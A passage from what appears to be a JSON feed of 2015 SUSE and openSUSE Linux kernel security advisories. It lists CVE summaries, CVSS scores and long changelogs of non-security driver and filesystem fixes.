(bsc#933907).\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731: Various issues\n in handling UDF filesystems in the Linux kernel allowed the corruption\n of kernel memory and other issues. An attacker able to mount a\n corrupted/malicious UDF file system image could cause the kernel to\n crash. (bsc#933904 bsc#933896)\n - CVE-2015-2150: The Linux kernel did not properly restrict access to PCI\n command registers, which might have allowed local guest users to cause a\n denial of service (non-maskable interrupt and host crash) by disabling\n the (1) memory or (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported Request (UR)\n response (bsc#919463).\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in the Linux kernel\n 2.6.x and 3.x in SUSE Linux distributions, allowed guest OS users to\n obtain sensitive information from uninitialized locations in host OS\n kernel memory via unspecified vectors (bnc#917830).\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux kernel did not\n prevent the TS_COMPAT flag from reaching a user-mode task, which might\n have allowed local users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1) fork or (2) close\n system call, as demonstrated by an attack against seccomp before 3.16\n (bnc#926240).\n - CVE-2015-1805: The Linux kernel's implementation of vectored pipe read\n and write functionality did not take into account the I/O vectors that\n were already processed when retrying after a failed atomic access\n operation, potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system. 
(bsc#933429).\n\n\n Also the following non-security bugs were fixed:\n - audit: keep inode pinned (bsc#851068).\n - btrfs: be aware of btree inode write errors to avoid fs corruption\n (bnc#942350).\n - btrfs: check if previous transaction aborted to avoid fs corruption\n (bnc#942350).\n - btrfs: deal with convert_extent_bit errors to avoid fs corruption\n (bnc#942350).\n - cifs: Fix missing crypto allocation (bnc#937402).\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bnc#932348).\n - drm: ast,cirrus,mgag200: use drm_can_sleep (bnc#883380, bsc#935572).\n - drm/cirrus: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: Do not do full cleanup if mgag200_device_init fails.\n - ext3: Fix data corruption in inodes with journalled data (bsc#936637)\n - ext4: handle SEEK_HOLE/SEEK_DATA generically (bsc#934944).\n - fanotify: Fix deadlock with permission events (bsc#935053).\n - fork: reset mm->pinned_vm (bnc#937855).\n - hrtimer: prevent timer interrupt DoS (bnc#886785).\n - hugetlb: do not account hugetlb pages as NR_FILE_PAGES (bnc#930092).\n - hugetlb, kabi: do not account hugetlb pages as NR_FILE_PAGES\n (bnc#930092).\n - IB/core: Fix mismatch between locked and pinned pages (bnc#937855).\n - iommu/amd: Fix memory leak in free_pagetable (bsc#935866).\n - iommu/amd: Handle integer overflow in dma_ops_area_alloc (bsc#931538).\n - iommu/amd: Handle large pages correctly in free_pagetable (bsc#935866).\n - ipr: Increase default adapter init stage change timeout (bsc#930761).\n - ixgbe: Use pci_vfs_assigned instead of ixgbe_vfs_are_assigned\n (bsc#927355).\n - kdump: fix crash_kexec()/smp_send_stop() race in panic() (bnc#937444).\n - kernel: add panic_on_warn. 
(bsc#934742)\n - kvm: irqchip: Break up high order allocations of kvm_irq_routing_table\n (bnc#926953).\n - libata: prevent HSM state change race between ISR and PIO (bsc#923245).\n - md: use kzalloc() when bitmap is disabled (bsc#939994).\n - megaraid_sas: Use correct reset sequence in adp_reset() (bsc#894936).\n - mlx4: Check for assigned VFs before disabling SR-IOV (bsc#927355).\n - mm/hugetlb: check for pte NULL pointer in __page_check_address()\n (bnc#929143).\n - mm: restrict access to slab files under procfs and sysfs (bnc#936077).\n - net: fib6: fib6_commit_metrics: fix potential NULL pointer dereference\n (bsc#867362).\n - net: Fix "ip rule delete table 256" (bsc#873385).\n - net: ipv6: fib: do not sleep inside atomic lock (bsc#867362).\n - net/mlx4_core: Do not disable SRIOV if there are active VFs (bsc#927355).\n - nfsd: Fix nfsv4 opcode decoding error (bsc#935906).\n - nfsd: support disabling 64bit dir cookies (bnc#937503).\n - nfs: never queue requests with rq_cong set on the sending queue\n (bsc#932458).\n - nfsv4: Minor cleanups for nfs4_handle_exception and\n nfs4_async_handle_error (bsc#939910).\n - pagecache limit: add tracepoints (bnc#924701).\n - pagecache limit: Do not skip over small zones that easily (bnc#925881).\n - pagecache limit: export debugging counters via /proc/vmstat (bnc#924701).\n - pagecache limit: fix wrong nr_reclaimed count (bnc#924701).\n - pagecache limit: reduce starvation due to reclaim retries (bnc#925903).\n - pci: Add SRIOV helper function to determine if VFs are assigned to guest\n (bsc#927355).\n - pci: Disable Bus Master only on kexec reboot (bsc#920110).\n - pci: disable Bus Master on PCI device shutdown (bsc#920110).\n - pci: Disable Bus Master unconditionally in pci_device_shutdown()\n (bsc#920110).\n - pci: Don't try to disable Bus Master on disconnected PCI devices\n (bsc#920110).\n - perf, nmi: Fix unknown NMI warning (bsc#929142).\n - perf/x86/intel: Move NMI clearing to end of PMI handler (bsc#929142).\n - 
rtlwifi: rtl8192cu: Fix kernel deadlock (bnc#927786).\n - sched: fix __sched_setscheduler() vs load balancing race (bnc#921430)\n - scsi_error: add missing case statements in scsi_decide_disposition()\n (bsc#920733).\n - scsi: Set hostbyte status in scsi_check_sense() (bsc#920733).\n - scsi: set host msg status correctly (bnc#933936)\n - scsi: vmw_pvscsi: Fix pvscsi_abort() function (bnc#940398 bsc#930934).\n - st: null pointer dereference panic caused by use after kref_put by\n st_open (bsc#936875).\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bnc#937641).\n - vmxnet3: Bump up driver version number (bsc#936423).\n - vmxnet3: Changes for vmxnet3 adapter version 2 (fwd) (bug#936423).\n - vmxnet3: Fix memory leaks in rx path (fwd) (bug#936423).\n - vmxnet3: Register shutdown handler for device (fwd) (bug#936423).\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - x86, tls: Interpret an all-zero struct user_desc as "no segment"\n (bsc#920250).\n - x86, tls, ldt: Stop checking lm in LDT_empty (bsc#920250).\n - xenbus: add proper handling of XS_ERROR from Xenbus for transactions.\n - xfs: avoid mounting of xfs filesystems with inconsistent option\n (bnc#925705)\n - zcrypt: Fixed reset and interrupt handling of AP queues (bnc#936925,\n LTC#126491).\n\n", "edition": 1, "modified": "2015-09-22T10:09:40", "published": "2015-09-22T10:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00018.html", "id": "SUSE-SU-2015:1592-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:44:54", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4003", "CVE-2015-4692", "CVE-2015-1420", "CVE-2015-5364", "CVE-2015-4002", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2015-1465", "CVE-2014-9730", 
"CVE-2015-5366", "CVE-2015-4001", "CVE-2014-9729", "CVE-2015-3636", "CVE-2015-3212", "CVE-2015-3290", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-4700"], "description": "The openSUSE 13.2 kernel was updated to receive various security and\n bugfixes.\n\n Following security bugs were fixed:\n - CVE-2015-3290: A flaw was found in the way the Linux kernel's nested NMI\n handler and espfix64 functionalities interacted during NMI processing. A\n local, unprivileged user could use this flaw to crash the system or,\n potentially, escalate their privileges on the system.\n - CVE-2015-3212: A race condition flaw was found in the way the Linux\n kernel's SCTP implementation handled Address Configuration lists when\n performing Address Configuration Change (ASCONF). A local attacker could\n use this flaw to crash the system via a race condition triggered by\n setting certain ASCONF options on a socket.\n - CVE-2015-5364: A remote denial of service (hang) via UDP flood with\n incorrect packet checksums was fixed. (bsc#936831).\n - CVE-2015-5366: A remote denial of service (unexpected error returns) via\n UDP flood with incorrect packet checksums was fixed. 
(bsc#936831).\n - CVE-2015-4700: A local user could have created a bad instruction in the\n JIT processed BPF code, leading to a kernel crash (bnc#935705).\n - CVE-2015-1420: Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel allowed local users to bypass intended\n size restrictions and trigger read operations on additional memory\n locations by changing the handle_bytes value of a file handle during the\n execution of this function (bnc#915517).\n - CVE-2015-4692: The kvm_apic_has_events function in arch/x86/kvm/lapic.h\n in the Linux kernel allowed local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly have unspecified\n other impact by leveraging /dev/kvm access for an ioctl call\n (bnc#935542).\n - CVE-2015-4167 CVE-2014-9728 CVE-2014-9730 CVE-2014-9729 CVE-2014-9731:\n Various problems in the UDF filesystem were fixed that could lead to\n crashes when mounting prepared udf filesystems.\n - CVE-2015-4002: drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver\n in the Linux kernel did not ensure that certain length values are\n sufficiently large, which allowed remote attackers to cause a denial of\n service (system crash or large loop) or possibly execute arbitrary code\n via a crafted packet, related to the (1) oz_usb_rx and (2)\n oz_usb_handle_ep_data functions (bnc#933934).\n - CVE-2015-4003: The oz_usb_handle_ep_data function in\n drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux\n kernel allowed remote attackers to cause a denial of service\n (divide-by-zero error and system crash) via a crafted packet\n (bnc#933934).\n - CVE-2015-4001: Integer signedness error in the oz_hcd_get_desc_cnf\n function in drivers/staging/ozwpan/ozhcd.c in the OZWPAN driver in the\n Linux kernel allowed remote attackers to cause a denial of service\n (system crash) or possibly execute arbitrary code via a crafted packet\n (bnc#933934).\n - CVE-2015-4036: A potential memory 
corruption in vhost/scsi was fixed.\n - CVE-2015-2922: The ndisc_router_discovery function in net/ipv6/ndisc.c\n in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack\n in the Linux kernel allowed remote attackers to reconfigure a hop-limit\n setting via a small hop_limit value in a Router Advertisement (RA)\n message (bnc#922583).\n - CVE-2015-3636: It was found that the Linux kernel's ping socket\n implementation did not properly handle socket unhashing during spurious\n disconnects, which could lead to a use-after-free flaw. On x86-64\n architecture systems, a local user able to create ping sockets could use\n this flaw to crash the system. On non-x86-64 architecture systems, a\n local user able to create ping sockets could use this flaw to escalate\n their privileges on the system.\n - CVE-2015-2041: net/llc/sysctl_net_llc.c in the Linux kernel used an\n incorrect data type in a sysctl table, which allowed local users to\n obtain potentially sensitive information from kernel memory or possibly\n have unspecified other impact by accessing a sysctl entry (bnc#919007).\n - CVE-2015-3339: Race condition in the prepare_binprm function in\n fs/exec.c in the Linux kernel allowed local users to gain privileges by\n executing a setuid program at a time instant when a chown to root is in\n progress, and the ownership is changed but the setuid bit is not yet\n stripped.\n - CVE-2015-1465: The IPv4 implementation in the Linux kernel did not\n properly consider the length of the Read-Copy Update (RCU) grace period\n for redirecting lookups in the absence of caching, which allowed remote\n attackers to cause a denial of service (memory consumption or system\n crash) via a flood of packets (bnc#916225).\n\n The following non-security bugs were fixed:\n - ALSA: ak411x: Fix stall in work callback (boo#934755).\n - ALSA: emu10k1: Emu10k2 32 bit DMA mode (boo#934755).\n - ALSA: emu10k1: Fix card shortname string buffer overflow (boo#934755).\n - ALSA: emu10k1: 
do not deadlock in proc-functions (boo#934755).\n - ALSA: emux: Fix mutex deadlock at unloading (boo#934755).\n - ALSA: emux: Fix mutex deadlock in OSS emulation (boo#934755).\n - ALSA: hda - Add AZX_DCAPS_SNOOP_OFF (and refactor snoop setup)\n (boo#934755).\n - ALSA: hda - Add Conexant codecs CX20721, CX20722, CX20723 and CX20724\n (boo#934755).\n - ALSA: hda - Add common pin macros for ALC269 family (boo#934755).\n - ALSA: hda - Add dock support for ThinkPad X250 (17aa:2226) (boo#934755).\n - ALSA: hda - Add dock support for Thinkpad T450s (17aa:5036) (boo#934755).\n - ALSA: hda - Add headphone quirk for Lifebook E752 (boo#934755).\n - ALSA: hda - Add headset mic quirk for Dell Inspiron 5548 (boo#934755).\n - ALSA: hda - Add mute-LED mode control to Thinkpad (boo#934755).\n - ALSA: hda - Add one more node in the EAPD supporting candidate list\n (boo#934755).\n - ALSA: hda - Add pin configs for ASUS mobo with IDT 92HD73XX codec\n (boo#934755).\n - ALSA: hda - Add ultra dock support for Thinkpad X240 (boo#934755).\n - ALSA: hda - Add workaround for CMI8888 snoop behavior (boo#934755).\n - ALSA: hda - Add workaround for MacBook Air 5,2 built-in mic (boo#934755).\n - ALSA: hda - Disable runtime PM for Panther Point again (boo#934755).\n - ALSA: hda - Do not access stereo amps for mono channel widgets\n (boo#934755).\n - ALSA: hda - Fix Dock Headphone on Thinkpad X250 seen as a Line Out\n (boo#934755).\n - ALSA: hda - Fix headphone pin config for Lifebook T731 (boo#934755).\n - ALSA: hda - Fix noise on AMD radeon 290x controller (boo#934755).\n - ALSA: hda - Fix probing and stuttering on CMI8888 HD-audio controller\n (boo#934755).\n - ALSA: hda - One more Dell machine needs DELL1_MIC_NO_PRESENCE quirk\n (boo#934755).\n - ALSA: hda - One more HP machine needs to change mute led quirk\n (boo#934755).\n - ALSA: hda - Set GPIO 4 low for a few HP machines (boo#934755).\n - ALSA: hda - Set single_adc_amp flag for CS420x codecs (boo#934755).\n - ALSA: hda - Treat 
stereo-to-mono mix properly (boo#934755).\n - ALSA: hda - change three SSID quirks to one pin quirk (boo#934755).\n - ALSA: hda - fix "num_steps = 0" error on ALC256 (boo#934755).\n - ALSA: hda - fix a typo by changing mute_led_nid to cap_mute_led_nid\n (boo#934755).\n - ALSA: hda - fix headset mic detection problem for one more machine\n (boo#934755).\n - ALSA: hda - fix mute led problem for three HP laptops (boo#934755).\n - ALSA: hda - set proper caps for newer AMD hda audio in KB/KV\n (boo#934755).\n - ALSA: hda/realtek - ALC292 dock fix for Thinkpad L450 (boo#934755).\n - ALSA: hda/realtek - Add a fixup for another Acer Aspire 9420\n (boo#934755).\n - ALSA: hda/realtek - Enable the ALC292 dock fixup on the Thinkpad T450\n (boo#934755).\n - ALSA: hda/realtek - Fix Headphone Mic does not recording for ALC256\n (boo#934755).\n - ALSA: hda/realtek - Make more stable to get pin sense for ALC283\n (boo#934755).\n - ALSA: hda/realtek - Support Dell headset mode for ALC256 (boo#934755).\n - ALSA: hda/realtek - Support HP mute led for output and input\n (boo#934755).\n - ALSA: hda/realtek - move HP_LINE1_MIC1_LED quirk for alc282 (boo#934755).\n - ALSA: hda/realtek - move HP_MUTE_LED_MIC1 quirk for alc282 (boo#934755).\n - ALSA: hdspm - Constrain periods to 2 on older cards (boo#934755).\n - ALSA: pcm: Do not leave PREPARED state after draining (boo#934755).\n - ALSA: snd-usb: add quirks for Roland UA-22 (boo#934755).\n - ALSA: usb - Creative USB X-Fi Pro SB1095 volume knob support\n (boo#934755).\n - ALSA: usb-audio: Add mic volume fix quirk for Logitech Quickcam Fusion\n (boo#934755).\n - ALSA: usb-audio: Add quirk for MS LifeCam HD-3000 (boo#934755).\n - ALSA: usb-audio: Add quirk for MS LifeCam Studio (boo#934755).\n - ALSA: usb-audio: Do not attempt to get Lifecam HD-5000 sample rate\n (boo#934755).\n - ALSA: usb-audio: Do not attempt to get Microsoft Lifecam Cinema sample\n rate (boo#934755).\n - ALSA: usb-audio: add MAYA44 USB+ mixer control names 
(boo#934755).\n - ALSA: usb-audio: do not try to get Benchmark DAC1 sample rate\n (boo#934755).\n - ALSA: usb-audio: do not try to get Outlaw RR2150 sample rate\n (boo#934755).\n - ALSA: usb-audio: fix missing input volume controls in MAYA44 USB(+)\n (boo#934755).\n - Automatically Provide/Obsolete all subpackages of old flavors\n (bnc#925567)\n - Fix kABI for ak411x structs (boo#934755).\n - Fix kABI for snd_emu10k1 struct (boo#934755).\n - HID: add ALWAYS_POLL quirk for a Logitech 0xc007 (bnc#929624).\n - HID: add HP OEM mouse to quirk ALWAYS_POLL (bnc#929624).\n - HID: add quirk for PIXART OEM mouse used by HP (bnc#929624).\n - HID: usbhid: add always-poll quirk (bnc#929624).\n - HID: usbhid: add another mouse that needs QUIRK_ALWAYS_POLL (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen 009b\n (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen 0103\n (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen 016f\n (bnc#929624).\n - HID: usbhid: fix PIXART optical mouse (bnc#929624).\n - HID: usbhid: more mice with ALWAYS_POLL (bnc#929624).\n - HID: usbhid: yet another mouse with ALWAYS_POLL (bnc#929624).\n - HID: yet another buggy ELAN touchscreen (bnc#929624).\n - Input: synaptics - handle spurious release of trackstick buttons\n (bnc#928693).\n - Input: synaptics - re-route tracksticks buttons on the Lenovo 2015\n series (bnc#928693).\n - Input: synaptics - remove TOPBUTTONPAD property for Lenovos 2015\n (bnc#928693).\n - Input: synaptics - retrieve the extended capabilities in query $10\n (bnc#928693).\n - NFSv4: When returning a delegation, do not reclaim an incompatible open\n mode (bnc#934202).\n - Refresh patches.xen/xen-blkfront-indirect (bsc#922235).\n - Update config files: extend CONFIG_DPM_WATCHDOG_TIMEOUT to 60\n (bnc#934397)\n - arm64: mm: Remove hack in mmap randomized layout Fix commit id and\n 
mainlined information\n - bnx2x: Fix kdump when iommu=on (bug#921769).\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bnc#932348).\n - config/armv7hl: Disable AMD_XGBE_PHY The AMD XGBE ethernet chip is only\n used on ARM64 systems.\n - config: disable XGBE on non-ARM hardware It is documented as being\n present only on AMD SoCs.\n - cpufreq: fix a NULL pointer dereference in __cpufreq_governor()\n (bsc#924664).\n - drm/i915/bdw: PCI IDs ending in 0xb are ULT (boo#935913).\n - drm/i915/chv: Remove Wait for a previous gfx force-off (boo#935913).\n - drm/i915/dp: only use training pattern 3 on platforms that support it\n (boo#935913).\n - drm/i915/dp: there is no audio on port A (boo#935913).\n - drm/i915/hsw: Fix workaround for server AUX channel clock divisor\n (boo#935913).\n - drm/i915/vlv: remove wait for previous GFX clk disable request\n (boo#935913).\n - drm/i915/vlv: save/restore the power context base reg (boo#935913).\n - drm/i915: Add missing MacBook Pro models with dual channel LVDS\n (boo#935913).\n - drm/i915: BDW Fix Halo PCI IDs marked as ULT (boo#935913).\n - drm/i915: Ban Haswell from using RCS flips (boo#935913).\n - drm/i915: Check obj->vma_list under the struct_mutex (boo#935913).\n - drm/i915: Correct the IOSF Dev_FN field for IOSF transfers (boo#935913).\n - drm/i915: Dell Chromebook 11 has PWM backlight (boo#935913).\n - drm/i915: Disable caches for Global GTT (boo#935913).\n - drm/i915: Do a dummy DPCD read before the actual read (bnc#907714).\n - drm/i915: Do not complain about stolen conflicts on gen3 (boo#935913).\n - drm/i915: Do not leak pages when freeing userptr objects (boo#935913).\n - drm/i915: Dont enable CS_PARSER_ERROR interrupts at all (boo#935913).\n - drm/i915: Evict CS TLBs between batches (boo#935913).\n - drm/i915: Fix DDC probe for passive adapters (boo#935913).\n - drm/i915: Fix and clean BDW PCH identification (boo#935913).\n - drm/i915: Force the CS stall for invalidate flushes 
(boo#935913).\n - drm/i915: Handle failure to kick out a conflicting fb driver\n (boo#935913).\n - drm/i915: Ignore SURFLIVE and flip counter when the GPU gets reset\n (boo#935913).\n - drm/i915: Ignore VBT backlight check on Macbook 2, 1 (boo#935913).\n - drm/i915: Invalidate media caches on gen7 (boo#935913).\n - drm/i915: Kick fbdev before vgacon (boo#935913).\n - drm/i915: Only fence tiled region of object (boo#935913).\n - drm/i915: Only warn the first time we attempt to mmio whilst suspended\n (boo#935913).\n - drm/i915: Unlock panel even when LVDS is disabled (boo#935913).\n - drm/i915: Use IS_HSW_ULT() in a HSW specific code path (boo#935913).\n - drm/i915: cope with large i2c transfers (boo#935913).\n - drm/i915: do not warn if backlight unexpectedly enabled (boo#935913).\n - drm/i915: drop WaSetupGtModeTdRowDispatch:snb (boo#935913).\n - drm/i915: save/restore GMBUS freq across suspend/resume on gen4\n (boo#935913).\n - drm/i915: vlv: fix IRQ masking when uninstalling interrupts (boo#935913).\n - drm/i915: vlv: fix save/restore of GFX_MAX_REQ_COUNT reg (boo#935913).\n - drm/radeon: retry dcpd fetch (bnc#931580).\n - ftrace/x86/xen: use kernel identity mapping only when really needed\n (bsc#873195, bsc#886272, bsc#903727, bsc#927725)\n - guards: Add support for an external filelist in --check mode This will\n allow us to run --check without a kernel-source.git work tree.\n - guards: Include the file name also in the "Not found" error\n - guards: Simplify help text\n - hyperv: Add processing of MTU reduced by the host (bnc#919596).\n - ideapad_laptop: Lenovo G50-30 fix rfkill reports wireless blocked\n (boo#939394).\n - ipv6: do not delete previously existing ECMP routes if add fails\n (bsc#930399).\n - ipv6: fix ECMP route replacement (bsc#930399).\n - ipv6: replacing a rt6_info needs to purge possible propagated rt6_infos\n too (bsc#930399).\n - kABI: protect linux/slab.h include in of/address.\n - kabi/severities: ignore already-broken but acceptable 
kABI changes -\n SYSTEM_TRUSTED_KEYRING=n change removed system_trusted_keyring -\n Commits 3688875f852 and ea5ed8c70e9 changed iov_iter_get_pages\n prototype - KVM changes are intermodule dependencies\n - kabi: Fix CRC for dma_get_required_mask.\n - kabi: add kABI reference files\n - libata: Blacklist queued TRIM on Samsung SSD 850 Pro (bsc#926156).\n - libata: Blacklist queued TRIM on all Samsung 800-series (bnc#930599).\n - net: ppp: Do not call bpf_prog_create() in ppp_lock (bnc#930488).\n - rpm/kernel-obs-qa.spec.in: Do not fail if the kernel versions do not\n match\n - rt2x00: do not align payload on modern H/W (bnc#932844).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bnc#927786).\n - thermal: step_wise: Revert optimization (boo#925961).\n - tty: Fix pty master poll() after slave closes v2 (bsc#937138).\n - arm64: mm: Remove hack in mmap randomize layout (bsc#937033)\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bnc#937226).\n - x86, apic: Handle a bad TSC more gracefully (boo#935530).\n - x86/PCI: Use host bridge _CRS info on Foxconn K8M890-8237A (bnc#907092).\n - x86/PCI: Use host bridge _CRS info on systems with >32 bit addressing\n (bnc#907092).\n - x86/microcode/amd: Do not overwrite final patch levels (bsc#913996).\n - x86/microcode/amd: Extract current patch level read to a function\n (bsc#913996).\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - xenbus: add proper handling of XS_ERROR from Xenbus for transactions.\n - xhci: Calculate old endpoints correctly on device reset (bnc#938976).\n\n", "edition": 1, "modified": "2015-08-14T11:09:20", "published": "2015-08-14T11:09:20", "id": "OPENSUSE-SU-2015:1382-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00011.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 9.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:04", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421"], "description": "This update supplies kgraft patches to fix one security vulnerability.\n\n CVE-2015-1421: A use-after-free vulnerability in the sctp_assoc_update\n function in net/sctp/associola.c in the Linux kernel allowed remote\n attackers to cause a denial of service (slab corruption and panic) or\n possibly have unspecified other impact by triggering an INIT collision\n that leads to improper handling of shared-key data.\n\n This patch supplies kgraft patches for the first kernel update and the\n second kernel update published for SUSE Linux Enterprise Server 12. The\n third kernel update contains the patch already.\n\n", "edition": 1, "modified": "2015-05-07T20:04:53", "published": "2015-05-07T20:04:53", "id": "SUSE-SU-2015:0832-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00001.html", "title": "Security update for kgraft-patch-SLE12_Update_1, kgraft-patch-SLE12_Update_2 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-3673", "CVE-2014-8160", "CVE-2014-7841", "CVE-2014-8559", "CVE-2014-9584", "CVE-2014-9419", "CVE-2014-3687"], "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.38 to receive\n various security and bugfixes.\n\n This update contains the following feature enablements:\n - The remote block device (rbd) and ceph drivers have been enabled and are\n now supported. (FATE#318350) These can be used e.g. for accessing the\n SUSE Enterprise Storage product services.\n\n - Support for Intel Select Bay trail CPUs has been added. 
(FATE#316038)\n\n Following security issues were fixed:\n - CVE-2014-9419: The __switch_to function in arch/x86/kernel/process_64.c\n in the Linux kernel through 3.18.1 did not ensure that Thread Local\n Storage (TLS) descriptors were loaded before proceeding with other\n steps, which made it easier for local users to bypass the ASLR\n protection mechanism via a crafted application that reads a TLS base\n address (bnc#911326).\n\n - CVE-2014-7822: A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file systems, a local,\n unprivileged user could have used this flaw to write past the maximum\n file size, and thus crash the system.\n\n - CVE-2014-8160: The connection tracking module could be bypassed if a\n specific protocol module was not loaded, e.g. allowing SCTP traffic\n while the firewall should have filtered it.\n\n - CVE-2014-9584: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel before 3.18.2 did not validate a\n length value in the Extensions Reference (ER) System Use Field, which\n allowed local users to obtain sensitive information from kernel memory\n via a crafted iso9660 image (bnc#912654).\n\n The following non-security bugs were fixed:\n - audit: Allow login in non-init namespaces (bnc#916107).\n - btrfs: avoid unnecessary switch of path locks to blocking mode.\n - btrfs: fix directory inconsistency after fsync log replay (bnc#915425).\n - btrfs: fix fsync log replay for inodes with a mix of regular refs and\n extrefs (bnc#915425).\n - btrfs: fix fsync race leading to ordered extent memory leaks\n (bnc#917128).\n - btrfs: fix fsync when extend references are added to an inode\n (bnc#915425).\n - btrfs: fix missing error handler if submiting re-read bio fails.\n - btrfs: fix race between transaction commit and empty block group removal\n (bnc#915550).\n - btrfs: fix scrub race leading to use-after-free (bnc#915456).\n - btrfs: fix setup_leaf_for_split() to 
avoid leaf corruption (bnc#915454).\n - btrfs: improve free space cache management and space allocation.\n - btrfs: make btrfs_search_forward return with nodes unlocked.\n - btrfs: scrub, fix sleep in atomic context (bnc#915456).\n - btrfs: unlock nodes earlier when inserting items in a btree.\n - drm/i915: On G45 enable cursor plane briefly after enabling the display\n plane (bnc#918161).\n - Fix Module.supported handling for external modules (bnc#905304).\n - keys: close race between key lookup and freeing (bnc#912202).\n - msi: also reject resource with flags all clear.\n - pci: Add ACS quirk for Emulex NICs (bug#917089).\n - pci: Add ACS quirk for Intel 10G NICs (bug#917089).\n - pci: Add ACS quirk for Solarflare SFC9120 & SFC9140 (bug#917089).\n - Refresh other Xen patches (bsc#909829).\n - Update\n patches.suse/btrfs-8177-improve-free-space-cache-management-and-space-.patch\n (bnc#895805).\n - be2net: avoid flashing SH-B0 UFI image on SH-P2 chip (bug#908322).\n - be2net: refactor code that checks flash file compatibility (bug#908322).\n - ceph: Add necessary clean up if invalid reply received in handle_reply()\n (bsc#918255).\n - crush: CHOOSE_LEAF -> CHOOSELEAF throughout (bsc#918255).\n - crush: add SET_CHOOSE_TRIES rule step (bsc#918255).\n - crush: add note about r in recursive choose (bsc#918255).\n - crush: add set_choose_local_[fallback_]tries steps (bsc#918255).\n - crush: apply chooseleaf_tries to firstn mode too (bsc#918255).\n - crush: attempts -> tries (bsc#918255).\n - crush: clarify numrep vs endpos (bsc#918255).\n - crush: eliminate CRUSH_MAX_SET result size limitation (bsc#918255).\n - crush: factor out (trivial) crush_destroy_rule() (bsc#918255).\n - crush: fix crush_choose_firstn comment (bsc#918255).\n - crush: fix some comments (bsc#918255).\n - crush: generalize descend_once (bsc#918255).\n - crush: new SET_CHOOSE_LEAF_TRIES command (bsc#918255).\n - crush: pass parent r value for indep call (bsc#918255).\n - crush: pass weight 
vector size to map function (bsc#918255).\n - crush: reduce scope of some local variables (bsc#918255).\n - crush: return CRUSH_ITEM_UNDEF for failed placements with indep\n (bsc#918255).\n - crush: strip firstn conditionals out of crush_choose, rename\n (bsc#918255).\n - crush: use breadth-first search for indep mode (bsc#918255).\n - crypto: drbg - panic on continuous self test error (bsc#905482).\n - dasd: List corruption in error recovery (bnc#914291, LTC#120865).\n - epoll: optimize setting task running after blocking (epoll-performance).\n - fips: We need to activate gcm(aes) in FIPS mode, RFCs 4106 and 4543\n (bsc#914126,bsc#914457).\n - fips: __driver-gcm-aes-aesni needs to be listed explicitly inside the\n testmgr.c file (bsc#914457).\n - flow_dissector: add tipc support (bnc#916513).\n - hotplug, powerpc, x86: Remove cpu_hotplug_driver_lock() (bsc#907069).\n - hyperv: Add support for vNIC hot removal.\n - kernel: incorrect clock_gettime result (bnc#914291, LTC#121184).\n - kvm: iommu: Add cond_resched to legacy device assignment code\n (bsc#898687).\n - libceph: CEPH_OSD_FLAG_* enum update (bsc#918255).\n - libceph: add ceph_kv{malloc,free}() and switch to them (bsc#918255).\n - libceph: add ceph_pg_pool_by_id() (bsc#918255).\n - libceph: all features fields must be u64 (bsc#918255).\n - libceph: dout() is missing a newline (bsc#918255).\n - libceph: factor out logic from ceph_osdc_start_request() (bsc#918255).\n - libceph: fix error handling in ceph_osdc_init() (bsc#918255).\n - libceph: follow redirect replies from osds (bsc#918255).\n - libceph: follow {read,write}_tier fields on osd request submission\n (bsc#918255).\n - libceph: introduce and start using oid abstraction (bsc#918255).\n - libceph: rename MAX_OBJ_NAME_SIZE to CEPH_MAX_OID_NAME_LEN (bsc#918255).\n - libceph: rename 